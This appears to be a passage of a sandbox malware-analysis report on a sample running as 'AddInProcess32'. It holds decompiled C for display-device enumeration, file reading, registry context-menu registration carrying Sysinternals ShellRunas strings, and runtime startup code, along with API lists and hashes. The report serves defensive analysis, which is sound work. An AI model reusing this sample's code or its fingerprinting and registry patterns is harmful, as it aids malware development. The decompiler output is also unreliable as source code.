                                              0x02b52fb9
                                              0x00000000
                                              0x00000000
                                              0x02b52ea9
                                              0x02b52eae
                                              0x02b52eba
                                              0x02b52ec2
                                              0x02b52ecd
                                              0x02b52ed5
                                              0x02b52ee8
                                              0x02b52efb
                                              0x02b52f0e
                                              0x02b52f21
                                              0x02b52f35
                                              0x02b52f50
                                              0x02b52f52
                                              0x02b52f56
                                              0x02b52f5f
                                              0x02b52f6b
                                              0x02b52f7f
                                              0x02b52f8e
                                              0x02b52f98
                                              0x02b52f9c
                                              0x02b52f9c
                                              0x02b52fa0
                                              0x02b52fa6
                                              0x02b52fac
                                              0x02b52fad
                                              0x02b52fae
                                              0x02b52faf
                                              0x02b52faf
                                              0x02b52fd3

                                              APIs
                                              • lstrcatA.KERNEL32 ref: 02B52ED5
                                              • lstrcatA.KERNEL32(?,000001A8), ref: 02B52EE8
                                              • lstrcatA.KERNEL32(?,02B5447C), ref: 02B52EFB
                                              • lstrcatA.KERNEL32(?,?), ref: 02B52F0E
                                              • lstrcatA.KERNEL32(?,02B5447C), ref: 02B52F21
                                              • EnumDisplayDevicesA.USER32(?,00000000,?,00000001), ref: 02B52F4C
                                              • lstrcatA.KERNEL32(?,?), ref: 02B52F5F
                                              • lstrcatA.KERNEL32(?,02B5447C), ref: 02B52F6B
                                              • EnumDisplayDevicesA.USER32(?,?,?,00000001), ref: 02B52F96
                                              • GetLastError.KERNEL32 ref: 02B52FA0
                                              • EnumDisplayDevicesA.USER32(00000000,00000000,?), ref: 02B52FB5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: lstrcat$DevicesDisplayEnum$ErrorLast
                                              • String ID:
                                              • API String ID: 2199724215-0
                                              • Opcode ID: 858cd509b39438ccf8fc5cf2dbc50a1a60e33ef9600a9a6507b71edd4afa1c53
                                              • Instruction ID: 4e1ba14867f1581a9ed424e66796a8611188b4a442559c3b7252f5ad9017f5ac
                                              • Opcode Fuzzy Hash: 858cd509b39438ccf8fc5cf2dbc50a1a60e33ef9600a9a6507b71edd4afa1c53
                                              • Instruction Fuzzy Hash: BA416072649355AFE620DF60DC85FEB77ECEF88340F000959F989CB180DB7196498B92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E00401BA0(void* __eax, void* __esi, void* __eflags, char _a4) {
                                              				void* __ebx;
                                              				struct HWND__* _t9;
                                              				struct HWND__* _t16;
                                              				void* _t17;
                                              				void* _t20;
                                              				void* _t21;
                                              
                                              				_t17 = __esi;
                                              				_t12 = __eax;
                                              				_t16 = E004019F0(__eax, L".exe", L"Software\\Classes\\SystemFileAssociations");
                                              				_t21 = _t20 + 4;
                                              				if(_t16 != 0) {
                                              					L5:
                                              					if(_a4 != 0) {
                                              						_push(_t17);
                                              						E00401880(L"Error registering context menu hander", _t16);
                                              						_t21 = _t21 + 4;
                                              					}
                                              					E00401930(0);
                                              					return _t16;
                                              				}
                                              				_t16 = E004019F0(_t12, L"lnkfile", L"Software\\Classes");
                                              				_t21 = _t21 + 4;
                                              				if(_t16 != 0) {
                                              					goto L5;
                                              				}
                                              				_t9 = E004019F0(_t12, L".msc", L"Software\\Classes\\SystemFileAssociations");
                                              				_t16 = _t9;
                                              				_t21 = _t21 + 4;
                                              				if(_t16 != 0) {
                                              					goto L5;
                                              				}
                                              				if(_a4 == _t9) {
                                              					return _t9;
                                              				} else {
                                              					MessageBoxW(_t9, L"ShellRunas context menu handler successfully registered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
                                              					return _t16;
                                              				}
                                              			}









                                              0x00401ba0
                                              0x00401ba2
                                              0x00401bb3
                                              0x00401bb5
                                              0x00401bba
                                              0x00401c0a
                                              0x00401c0f
                                              0x00401c11
                                              0x00401c18
                                              0x00401c1d
                                              0x00401c20
                                              0x00401c23
                                              0x00000000
                                              0x00401c2b
                                              0x00401bcb
                                              0x00401bcd
                                              0x00401bd2
                                              0x00000000
                                              0x00000000
                                              0x00401bde
                                              0x00401be3
                                              0x00401be5
                                              0x00401bea
                                              0x00000000
                                              0x00000000
                                              0x00401bf0
                                              0x00401c2f
                                              0x00401bf2
                                              0x00401bff
                                              0x00401c09
                                              0x00401c09

                                              APIs
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
                                                • Part of subcall function 004019F0: RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
                                                • Part of subcall function 004019F0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0
                                                • Part of subcall function 004019F0: _swprintf.LIBCMT ref: 00401B1A
                                                • Part of subcall function 004019F0: RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B61
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B68
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B6F
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B76
                                                • Part of subcall function 004019F0: RegCloseKey.ADVAPI32(?), ref: 00401B7D
                                              • MessageBoxW.USER32(00000000,ShellRunas context menu handler successfully registered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 00401BFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CloseCreate$FileMessageModuleNameValue_swprintf
                                              • String ID: .exe$.msc$Error registering context menu hander$ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler successfully registered.$Software\Classes$Software\Classes\SystemFileAssociations$lnkfile
                                              • API String ID: 23047349-2855299177
                                              • Opcode ID: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
                                              • Instruction ID: d48563127560b7a8e7189787d004048206fac3746307ea1a651a0f4517783a92
                                              • Opcode Fuzzy Hash: 0d7b3cff5730ebffb2b1ca40e72fbba3252ccff6b5cd4318ad2bd8684b1371f8
                                              • Instruction Fuzzy Hash: F8F0A7B5AC430422F3112296290279B114587D17B5F1C407BFE55773F3D97CC885826E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			E00401880(void* __esi, long _a4) {
                                              				signed int _v4;
                                              				short _v516;
                                              				short _v520;
                                              				signed int _t8;
                                              				long _t10;
                                              				void* _t14;
                                              				void* _t18;
                                              				signed int _t26;
                                              				signed int _t27;
                                              
                                              				_t25 = __esi;
                                              				_t26 =  &_v520;
                                              				_t8 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t8 ^ _t26;
                                              				_t10 = _a4;
                                              				if(_t10 == 0) {
                                              					E004032BD( &_v516, 0x100, L"%s.", __esi);
                                              					_t27 = _t26 + 0x10;
                                              				} else {
                                              					FormatMessageW(0x1100, 0, _t10, 0x400,  &_v520, 0, 0);
                                              					_push(_v520);
                                              					E004032BD( &_v516, 0x100, L"%s:\n%s", __esi);
                                              					_t27 = _t26 + 0x14;
                                              				}
                                              				MessageBoxW(0,  &_v516, L"ShellRunas - Sysinternals: www.sysinternals.com", 0x10);
                                              				_t14 = LocalFree(_v520);
                                              				E0040318A(_t14, _t18, _v4 ^ _t27, _t25);
                                              				return _t14;
                                              			}












                                              0x00401880
                                              0x00401880
                                              0x00401886
                                              0x0040188d
                                              0x00401894
                                              0x0040189d
                                              0x004018e9
                                              0x004018ee
                                              0x0040189f
                                              0x004018b5
                                              0x004018be
                                              0x004018cf
                                              0x004018d4
                                              0x004018d4
                                              0x004018ff
                                              0x00401909
                                              0x00401918
                                              0x00401923

                                              APIs
                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 004018B5
                                              • _swprintf.LIBCMT ref: 004018CF
                                                • Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0
                                              • _swprintf.LIBCMT ref: 004018E9
                                              • MessageBoxW.USER32(00000000,?,ShellRunas - Sysinternals: www.sysinternals.com,00000010), ref: 004018FF
                                              • LocalFree.KERNEL32(00000000), ref: 00401909
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Message_swprintf$FormatFreeLocal__vswprintf_s_l
                                              • String ID: %s.$%s:%s$Error launching application$ShellRunas - Sysinternals: www.sysinternals.com
                                              • API String ID: 1614748391-2411704194
                                              • Opcode ID: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
                                              • Instruction ID: d7ba5e9dad247dd55833599d546a55f01d268ccc4582619336c1b705aef3043d
                                              • Opcode Fuzzy Hash: 0d8038b8c8fa5fae2156050a63efd2f74c1b151e05b4e0866b50721f8c9af105
                                              • Instruction Fuzzy Hash: 090188B06443007BE220EB50CC4BFEB7BA8AF5CB51F50892DB659A61C1DBF4A544C75E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E02B529B2(WCHAR* __ecx, void** __edx, long* _a4) {
                                              				long _v8;
                                              				long _v12;
                                              				void** _v16;
                                              				long _t26;
                                              				void* _t31;
                                              				void* _t33;
                                              
                                              				_t26 = 0;
                                              				_v16 = __edx;
                                              				_t33 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                              				_t31 = 0;
                                              				if(_t33 == 0xffffffff) {
                                              					L6:
                                              					 *_a4 = _t26;
                                              					 *_v16 = _t31;
                                              					return 1;
                                              				}
                                              				if(GetFileSize(_t33,  &_v12) != 0) {
                                              					_v8 = _v8 & 0;
                                              					_t26 = GetFileSize(_t33,  &_v12);
                                              					_t31 = HeapAlloc(GetProcessHeap(), 0, _t26);
                                              					ReadFile(_t33, _t31, _t26,  &_v8, 0);
                                              					if(_t26 == _v8) {
                                              						CloseHandle(_t33);
                                              						goto L6;
                                              					}
                                              					HeapFree(GetProcessHeap(), 0, _t31);
                                              				}
                                              				CloseHandle(_t33);
                                              				return 0;
                                              			}









                                              0x02b529bb
                                              0x02b529bd
                                              0x02b529d3
                                              0x02b529d5
                                              0x02b529da
                                              0x02b52a43
                                              0x02b52a49
                                              0x02b52a4e
                                              0x00000000
                                              0x02b52a4e
                                              0x02b529eb
                                              0x02b529f8
                                              0x02b52a02
                                              0x02b52a16
                                              0x02b52a1f
                                              0x02b52a28
                                              0x02b52a3d
                                              0x00000000
                                              0x02b52a3d
                                              0x02b52a34
                                              0x02b52a34
                                              0x02b529ee
                                              0x00000000

                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B529CD
                                              • GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B529E7
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B529EE
                                              • GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B52A00
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B52A07
                                              • HeapAlloc.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A0E
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,?,02B5140A,?), ref: 02B52A1F
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B52A2D
                                              • HeapFree.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A34
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B52A3D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: FileHeap$CloseHandleProcessSize$AllocCreateFreeRead
                                              • String ID:
                                              • API String ID: 1490804313-0
                                              • Opcode ID: d5ce433b007f0e70924623a9044dbf798d239767d52208c7413169e2b1431b43
                                              • Instruction ID: 0d6d54fd8cdc5c9aa6f9066f94e020749082ee833d49854584ed31caf755459e
                                              • Opcode Fuzzy Hash: d5ce433b007f0e70924623a9044dbf798d239767d52208c7413169e2b1431b43
                                              • Instruction Fuzzy Hash: 3811B172941228BFE7109FA59C88FAF7BBCEF48295F250565FA05DB140D7704E458B70
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E00406529(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                              				struct HINSTANCE__* _t21;
                                              				long _t23;
                                              				intOrPtr _t25;
                                              				intOrPtr _t29;
                                              				intOrPtr _t40;
                                              				void* _t41;
                                              
                                              				_t33 = __ebx;
                                              				_push(0xc);
                                              				_push(0x411a98);
                                              				E00404A88(__ebx, __edi, __esi);
                                              				_t21 = GetModuleHandleA("KERNEL32.DLL");
                                              				 *(_t41 - 0x1c) = _t21;
                                              				_t40 =  *((intOrPtr*)(_t41 + 8));
                                              				 *((intOrPtr*)(_t40 + 0x5c)) = 0x413990;
                                              				 *((intOrPtr*)(_t40 + 0x14)) = 1;
                                              				_t43 = _t21;
                                              				if(_t21 != 0 && E00406360(_t43) != 0) {
                                              					_t33 = GetProcAddress;
                                              					 *((intOrPtr*)(_t40 + 0x1f8)) = GetProcAddress( *(_t41 - 0x1c), "EncodePointer");
                                              					 *((intOrPtr*)(_t40 + 0x1fc)) = GetProcAddress( *(_t41 - 0x1c), "DecodePointer");
                                              				}
                                              				 *((intOrPtr*)(_t40 + 0x70)) = 1;
                                              				 *((char*)(_t40 + 0xc8)) = 0x43;
                                              				 *((char*)(_t40 + 0x14b)) = 0x43;
                                              				 *(_t40 + 0x68) = 0x4132a8;
                                              				_t23 = InterlockedIncrement(0x4132a8);
                                              				_push(0xc);
                                              				E00403F58(_t23, _t33);
                                              				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                              				_t25 =  *((intOrPtr*)(_t41 + 0xc));
                                              				 *((intOrPtr*)(_t40 + 0x6c)) = _t25;
                                              				if(_t25 == 0) {
                                              					_t29 =  *0x4138b0; // 0x4137d8
                                              					 *((intOrPtr*)(_t40 + 0x6c)) = _t29;
                                              				}
                                              				_push( *((intOrPtr*)(_t40 + 0x6c)));
                                              				E0040619A();
                                              				 *(_t41 - 4) = 0xfffffffe;
                                              				return E00404ACD(E004065DF());
                                              			}









                                              0x00406529
                                              0x00406529
                                              0x0040652b
                                              0x00406530
                                              0x0040653a
                                              0x00406540
                                              0x00406543
                                              0x00406546
                                              0x00406550
                                              0x00406553
                                              0x00406555
                                              0x00406568
                                              0x00406570
                                              0x00406580
                                              0x00406580
                                              0x00406586
                                              0x00406589
                                              0x00406590
                                              0x0040659c
                                              0x004065a0
                                              0x004065a6
                                              0x004065a8
                                              0x004065ae
                                              0x004065b2
                                              0x004065b5
                                              0x004065ba
                                              0x004065bc
                                              0x004065c1
                                              0x004065c1
                                              0x004065c4
                                              0x004065c7
                                              0x004065cd
                                              0x004065de

                                              APIs
                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
                                              • GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
                                              • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
                                              • InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
                                              • ___addlocaleref.LIBCMT ref: 004065C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref
                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                              • API String ID: 1389861978-2843748187
                                              • Opcode ID: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
                                              • Instruction ID: 24d076e0758c3fb3c9b827cd62f2c980b6cafb2106825d784225c4fa2649cf60
                                              • Opcode Fuzzy Hash: d8b2b6e96166e3e6081c3c5c7c145de861ff6874afd2058ea1e84f3c4318444a
                                              • Instruction Fuzzy Hash: 12116DB1940705AED720AFB69905B5ABBE0AF00314F10853EE99AB62D0DB78A9448F1D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E00407844(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                              				signed int _t61;
                                              				void* _t64;
                                              				long _t68;
                                              				signed int _t71;
                                              				signed int _t72;
                                              				int* _t74;
                                              				signed int* _t77;
                                              				signed char _t79;
                                              				long _t86;
                                              				signed int _t88;
                                              				int* _t89;
                                              				signed int _t92;
                                              				void* _t98;
                                              				signed int** _t101;
                                              				signed int _t102;
                                              				void* _t106;
                                              				int _t107;
                                              				int _t109;
                                              				void** _t112;
                                              				signed int _t114;
                                              				void** _t118;
                                              				void* _t119;
                                              
                                              				_t102 = __edx;
                                              				_push(0x54);
                                              				_push(0x411b00);
                                              				E00404A88(__ebx, __edi, __esi);
                                              				 *(_t119 - 4) = 0;
                                              				GetStartupInfoA(_t119 - 0x64);
                                              				 *(_t119 - 4) = 0xfffffffe;
                                              				_push(0x38);
                                              				_t109 = 0x20;
                                              				_push(_t109);
                                              				_t61 = E00407C87();
                                              				if(_t61 == 0) {
                                              					L45:
                                              					_t62 = _t61 | 0xffffffff;
                                              					__eflags = _t61 | 0xffffffff;
                                              					L46:
                                              					return E00404ACD(_t62);
                                              				}
                                              				 *0x415ae0 = _t61;
                                              				 *0x415ac8 = _t109;
                                              				_t4 = _t61 + 0x700; // 0x700
                                              				_t92 = _t4;
                                              				while(_t61 < _t92) {
                                              					 *((char*)(_t61 + 4)) = 0;
                                              					 *_t61 =  *_t61 | 0xffffffff;
                                              					 *((char*)(_t61 + 5)) = 0xa;
                                              					 *((intOrPtr*)(_t61 + 8)) = 0;
                                              					 *((char*)(_t61 + 0x24)) = 0;
                                              					 *((char*)(_t61 + 0x25)) = 0xa;
                                              					 *((char*)(_t61 + 0x26)) = 0xa;
                                              					_t61 = _t61 + 0x38;
                                              					_t92 =  *0x415ae0 + 0x700;
                                              					__eflags = _t92;
                                              				}
                                              				if( *((intOrPtr*)(_t119 - 0x32)) == 0) {
                                              					L26:
                                              					_t88 = 0;
                                              					do {
                                              						_t112 = _t88 * 0x38 +  *0x415ae0;
                                              						_t64 =  *_t112;
                                              						if(_t64 == 0xffffffff || _t64 == 0xfffffffe) {
                                              							_t112[1] = 0x81;
                                              							__eflags = _t88;
                                              							if(_t88 != 0) {
                                              								asm("sbb eax, eax");
                                              								_t68 =  ~(_t88 - 1) + 0xfffffff5;
                                              								__eflags = _t68;
                                              							} else {
                                              								_t68 = 0xfffffff6;
                                              							}
                                              							_t106 = GetStdHandle(_t68);
                                              							__eflags = _t106 - 0xffffffff;
                                              							if(_t106 == 0xffffffff) {
                                              								L42:
                                              								_t57 =  &(_t112[1]);
                                              								 *_t57 = _t112[1] | 0x00000040;
                                              								__eflags =  *_t57;
                                              								 *_t112 = 0xfffffffe;
                                              								goto L43;
                                              							} else {
                                              								__eflags = _t106;
                                              								if(_t106 == 0) {
                                              									goto L42;
                                              								}
                                              								_t71 = GetFileType(_t106);
                                              								__eflags = _t71;
                                              								if(_t71 == 0) {
                                              									goto L42;
                                              								}
                                              								 *_t112 = _t106;
                                              								_t72 = _t71 & 0x000000ff;
                                              								__eflags = _t72 - 2;
                                              								if(__eflags != 0) {
                                              									__eflags = _t72 - 3;
                                              									if(__eflags == 0) {
                                              										_t52 =  &(_t112[1]);
                                              										 *_t52 = _t112[1] | 0x00000008;
                                              										__eflags =  *_t52;
                                              									}
                                              								} else {
                                              									_t112[1] = _t112[1] | 0x00000040;
                                              								}
                                              								_push(0xfa0);
                                              								_t54 =  &(_t112[3]); // -4283092
                                              								_t61 = E00407B82(_t88, _t102, _t106, _t112, __eflags);
                                              								__eflags = _t61;
                                              								if(_t61 == 0) {
                                              									goto L45;
                                              								} else {
                                              									_t112[2] = _t112[2] + 1;
                                              									goto L43;
                                              								}
                                              							}
                                              						} else {
                                              							_t112[1] = _t112[1] | 0x00000080;
                                              						}
                                              						L43:
                                              						_t88 = _t88 + 1;
                                              					} while (_t88 < 3);
                                              					SetHandleCount( *0x415ac8);
                                              					_t62 = 0;
                                              					goto L46;
                                              				}
                                              				_t74 =  *(_t119 - 0x30);
                                              				if(_t74 == 0) {
                                              					goto L26;
                                              				}
                                              				_t107 =  *_t74;
                                              				_t89 =  &(_t74[1]);
                                              				 *(_t119 - 0x1c) = _t89 + _t107;
                                              				if(_t107 >= 0x800) {
                                              					_t107 = 0x800;
                                              				}
                                              				_t114 = 1;
                                              				while( *0x415ac8 < _t107) {
                                              					_t77 = E00407C87(0x20, 0x38);
                                              					__eflags = _t77;
                                              					if(__eflags == 0) {
                                              						_t107 =  *0x415ac8;
                                              						L17:
                                              						 *(_t119 - 0x20) =  *(_t119 - 0x20) & 0x00000000;
                                              						if(_t107 <= 0) {
                                              							goto L26;
                                              						} else {
                                              							goto L18;
                                              						}
                                              						do {
                                              							L18:
                                              							_t98 =  *( *(_t119 - 0x1c));
                                              							if(_t98 != 0xffffffff && _t98 != 0xfffffffe) {
                                              								_t79 =  *_t89;
                                              								if((_t79 & 0x00000001) == 0) {
                                              									goto L25;
                                              								}
                                              								if((_t79 & 0x00000008) != 0) {
                                              									L23:
                                              									_t118 = ( *(_t119 - 0x20) & 0x0000001f) * 0x38 + 0x415ae0[ *(_t119 - 0x20) >> 5];
                                              									 *_t118 =  *( *(_t119 - 0x1c));
                                              									_t118[1] =  *_t89;
                                              									_push(0xfa0);
                                              									_t39 =  &(_t118[3]); // 0xc
                                              									_t61 = E00407B82(_t89, _t102, _t107, _t118, _t132);
                                              									if(_t61 == 0) {
                                              										goto L45;
                                              									}
                                              									_t118[2] = _t118[2] + 1;
                                              									goto L25;
                                              								}
                                              								_t86 = GetFileType(_t98);
                                              								_t132 = _t86;
                                              								if(_t86 == 0) {
                                              									goto L25;
                                              								}
                                              								goto L23;
                                              							}
                                              							L25:
                                              							 *(_t119 - 0x20) =  *(_t119 - 0x20) + 1;
                                              							_t89 =  &(_t89[0]);
                                              							 *(_t119 - 0x1c) =  &(( *(_t119 - 0x1c))[1]);
                                              						} while ( *(_t119 - 0x20) < _t107);
                                              						goto L26;
                                              					}
                                              					_t101 =  &(0x415ae0[_t114]);
                                              					 *_t101 = _t77;
                                              					 *0x415ac8 =  *0x415ac8 + 0x20;
                                              					_t18 =  &(_t77[0x1c0]); // 0x700
                                              					_t102 = _t18;
                                              					while(1) {
                                              						__eflags = _t77 - _t102;
                                              						if(_t77 >= _t102) {
                                              							break;
                                              						}
                                              						_t77[1] = 0;
                                              						 *_t77 =  *_t77 | 0xffffffff;
                                              						_t77[1] = 0xa;
                                              						_t77[2] = _t77[2] & 0x00000000;
                                              						_t77[9] = _t77[9] & 0x00000080;
                                              						_t77[9] = 0xa;
                                              						_t77[9] = 0xa;
                                              						_t77 =  &(_t77[0xe]);
                                              						_t102 =  &(( *_t101)[0x1c0]);
                                              						__eflags = _t102;
                                              					}
                                              					_t114 = _t114 + 1;
                                              					__eflags = _t114;
                                              				}
                                              				goto L17;
                                              			}

























                                              0x00407844
                                              0x00407844
                                              0x00407846
                                              0x0040784b
                                              0x00407852
                                              0x00407859
                                              0x0040785f
                                              0x00407866
                                              0x0040786a
                                              0x0040786b
                                              0x0040786c
                                              0x00407875
                                              0x00407a7b
                                              0x00407a7b
                                              0x00407a7b
                                              0x00407a7e
                                              0x00407a83
                                              0x00407a83
                                              0x0040787b
                                              0x00407880
                                              0x00407886
                                              0x00407886
                                              0x004078b7
                                              0x0040788e
                                              0x00407892
                                              0x00407895
                                              0x00407899
                                              0x0040789c
                                              0x004078a0
                                              0x004078a4
                                              0x004078a8
                                              0x004078b1
                                              0x004078b1
                                              0x004078b1
                                              0x004078bf
                                              0x004079c2
                                              0x004079c2
                                              0x004079c4
                                              0x004079c9
                                              0x004079cf
                                              0x004079d4
                                              0x004079e1
                                              0x004079e5
                                              0x004079e7
                                              0x004079f3
                                              0x004079f5
                                              0x004079f5
                                              0x004079e9
                                              0x004079eb
                                              0x004079eb
                                              0x004079ff
                                              0x00407a01
                                              0x00407a04
                                              0x00407a49
                                              0x00407a49
                                              0x00407a49
                                              0x00407a49
                                              0x00407a4d
                                              0x00000000
                                              0x00407a06
                                              0x00407a06
                                              0x00407a08
                                              0x00000000
                                              0x00000000
                                              0x00407a0b
                                              0x00407a11
                                              0x00407a13
                                              0x00000000
                                              0x00000000
                                              0x00407a15
                                              0x00407a17
                                              0x00407a1c
                                              0x00407a1f
                                              0x00407a27
                                              0x00407a2a
                                              0x00407a2c
                                              0x00407a2c
                                              0x00407a2c
                                              0x00407a2c
                                              0x00407a21
                                              0x00407a21
                                              0x00407a21
                                              0x00407a30
                                              0x00407a35
                                              0x00407a39
                                              0x00407a40
                                              0x00407a42
                                              0x00000000
                                              0x00407a44
                                              0x00407a44
                                              0x00000000
                                              0x00407a44
                                              0x00407a42
                                              0x004079db
                                              0x004079db
                                              0x004079db
                                              0x00407a53
                                              0x00407a53
                                              0x00407a54
                                              0x00407a63
                                              0x00407a69
                                              0x00000000
                                              0x00407a69
                                              0x004078c5
                                              0x004078ca
                                              0x00000000
                                              0x00000000
                                              0x004078d0
                                              0x004078d2
                                              0x004078d8
                                              0x004078e2
                                              0x004078e4
                                              0x004078e4
                                              0x004078e8
                                              0x0040793d
                                              0x004078ef
                                              0x004078f6
                                              0x004078f8
                                              0x00407947
                                              0x0040794d
                                              0x0040794d
                                              0x00407953
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00407955
                                              0x00407955
                                              0x00407958
                                              0x0040795d
                                              0x00407964
                                              0x00407968
                                              0x00000000
                                              0x00000000
                                              0x0040796c
                                              0x00407979
                                              0x00407987
                                              0x00407993
                                              0x00407997
                                              0x0040799a
                                              0x0040799f
                                              0x004079a3
                                              0x004079ac
                                              0x00000000
                                              0x00000000
                                              0x004079b2
                                              0x00000000
                                              0x004079b2
                                              0x0040796f
                                              0x00407975
                                              0x00407977
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00407977
                                              0x004079b5
                                              0x004079b5
                                              0x004079b8
                                              0x004079b9
                                              0x004079bd
                                              0x00000000
                                              0x00407955
                                              0x004078fa
                                              0x00407901
                                              0x00407903
                                              0x0040790a
                                              0x0040790a
                                              0x00407938
                                              0x00407938
                                              0x0040793a
                                              0x00000000
                                              0x00000000
                                              0x00407912
                                              0x00407916
                                              0x00407919
                                              0x0040791d
                                              0x00407921
                                              0x00407925
                                              0x00407929
                                              0x0040792d
                                              0x00407932
                                              0x00407932
                                              0x00407932
                                              0x0040793c
                                              0x0040793c
                                              0x0040793c
                                              0x00000000

                                              APIs
                                              • GetStartupInfoA.KERNEL32(?), ref: 00407859
                                              • __calloc_crt.LIBCMT ref: 0040786C
                                                • Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
                                                • Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC
                                              • __calloc_crt.LIBCMT ref: 004078EF
                                              • GetFileType.KERNEL32(00000038), ref: 0040796F
                                              • ___crtInitCritSecAndSpinCount.LIBCMT ref: 004079A3
                                              • GetStdHandle.KERNEL32(-000000F6), ref: 004079F9
                                              • GetFileType.KERNEL32(00000000), ref: 00407A0B
                                              • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00407A39
